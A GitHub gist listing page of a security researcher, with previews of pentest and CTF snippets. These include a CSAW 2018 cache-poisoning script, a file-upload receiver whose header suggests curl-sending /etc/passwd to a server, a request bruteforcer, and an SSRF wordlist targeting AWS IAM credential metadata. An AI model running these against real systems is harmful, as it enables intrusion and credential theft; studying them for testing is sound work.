Skip to content

Instantly share code, notes, and snippets.

View LuD1161's full-sized avatar
👋
Hey ! Wassup 😃 Lets talk security 😎

Aseem Shrey LuD1161

👋
Hey ! Wassup 😃 Lets talk security 😎
206 followers · 16 following
View GitHub Profile
@LuD1161
LuD1161 / WAHH_Task_Checklist.md
Created July 19, 2018 16:12 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@LuD1161
LuD1161 / cors_and_clickjacking_checker.html
Created July 24, 2018 12:24
cors_and_clickjacking_checker
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>CORS and Clickjacking checker</title>
<style>
body {
font-family: Arial;
color: white;
}
@LuD1161
LuD1161 / findFile.py
Created August 24, 2018 16:35
"""
A horrible script, however gets things done ;)
USE CASE : If file encrypted with simple xor
Enter expected key, can be file format's hex
It will automatically find the key based on that header
And write out a new file out of it
"""
@LuD1161
LuD1161 / .myprompt.sh
Last active February 6, 2019 20:54
My Bash Prompt
#!/bin/bash
#=========================================================
#Terminal Color Codes
#=========================================================
WHITE='\[\033[1;37m\]'
LIGHTGRAY='\[\033[0;37m\]'
GRAY='\[\033[1;30m\]'
BLACK='\[\033[0;30m\]'
RED='\[\033[0;31m\]'
@LuD1161
LuD1161 / poison.py
Created September 17, 2018 10:33
poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
from time import sleep
import requests
import webbrowser
X_Forwarded_Host = 'my_server'
while True:
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
print resp.headers
sleep(0.5)
@LuD1161
LuD1161 / app.js
Created September 17, 2018 11:18
Files for Hacker Movie Club Challenge - CSAW Quals 2018
var token = null;
Promise.all([
fetch('/api/movies').then(r=>r.json()),
fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()),
new Promise((resolve) => {
if (window.loaded_recapcha === true)
return resolve();
window.loaded_recapcha = resolve;
}),
@LuD1161
LuD1161 / upload.php
Last active September 30, 2018 17:44
Uploader script
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1>
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2>
<form enctype="multipart/form-data" method="POST">
<p>Upload your file</p>
@LuD1161
LuD1161 / multiple-targets.sh
Created October 10, 2018 16:57
Multiple Targets for the master script
#!/bin/bash
if [ -z "$1" ]
then
echo "Target file not specified"
echo "Usage : ./multiple-targets.sh file_name"
exit 1
fi
for target in $(cat $1);
@LuD1161
LuD1161 / bruteforcer.py
Created January 5, 2019 15:32
Bruteforcer for web requests
import asyncio
from aiohttp import ClientSession
import json
headers = {
'Content-Type': 'application/json',
'Charset': 'UTF-8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
} # Change the headers accordingly
@LuD1161
LuD1161 / cloud_metadata.txt
Created January 11, 2019 08:59 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname